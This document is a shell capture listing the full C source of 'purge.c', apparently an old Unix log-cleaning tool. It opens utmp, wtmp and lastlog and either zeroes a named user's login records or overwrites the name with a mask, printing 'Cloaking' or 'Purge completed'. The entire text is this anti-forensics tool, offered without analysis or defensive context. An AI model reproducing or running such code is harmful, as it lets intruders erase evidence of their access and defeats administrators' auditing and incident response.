bash# cat purge.c
/*#define PURGE SYSTEM*/
#include <sys/types.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/file.h>
#include <fcntl.h>
#include <utmp.h>
#include <pwd.h>
#include <lastlog.h>
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
 
int f;
 
void kill_utmp(who,mask)
char *who, *mask;
{
    struct utmp utmp_ent;
  printf("%s\n",mask);
  if ((f=open(UTMP_NAME,O_RDWR))>=0) {
     while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
       if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
if(mask==NULL) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
} else {
 strcpy(utmp_ent.ut_name,mask);
}
                 lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
                 write (f, &utmp_ent, sizeof (utmp_ent));
            }
     close(f);
  }
}
 
void kill_wtmp(who, mask)
char *who, *mask;
{
    struct utmp utmp_ent;
    long pos;
 
    pos = 1L;
    if ((f=open(WTMP_NAME,O_RDWR))>=0) {
 
     while(pos != -1L) {
        lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
        if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
          pos = -1L;
        } else {
          if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
if(mask==NULL) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
} else {
 strcpy(utmp_ent.ut_name,mask);
}
               lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
               write (f, &utmp_ent, sizeof (utmp_ent));
#ifndef PURGE
printf("Non-purge\n");
               pos = -1L;
#endif
          } else pos += 1L;
        }
     }
     close(f);
  }
}
 
void kill_lastlog(who)
char *who;
{
    struct passwd *pwd;
    struct lastlog newll;
 
     if ((pwd=getpwnam(who))!=NULL) {
 
        if ((f=open(LASTLOG_NAME, O_RDWR)) >= 0) {
            lseek(f, (long)pwd->pw_uid * sizeof (struct lastlog), 0);
            bzero((char *)&newll,sizeof( newll ));
            write(f, (char *)&newll, sizeof( newll ));
            close(f);
        }
 
    } else printf("unkown user %s: non-fatal error\n",who);
}
 
main(argc,argv)
int argc;
char *argv[];
{
    if (argc>1) {
#ifdef PURGE
printf("Purge activated\n");
#endif
printf("UTMP\n");
        kill_utmp(argv[1],argv[2]);
if (argc<3){
printf("Last Log\n");
        kill_lastlog(argv[1]);
printf("WTMP\n");
        kill_wtmp(argv[1],NULL);
}
#ifdef PURGE
printf("Purge completed\n");
#else
printf("Cloaking\n");
#endif
    } else
    printf("Not!\n");
}
 
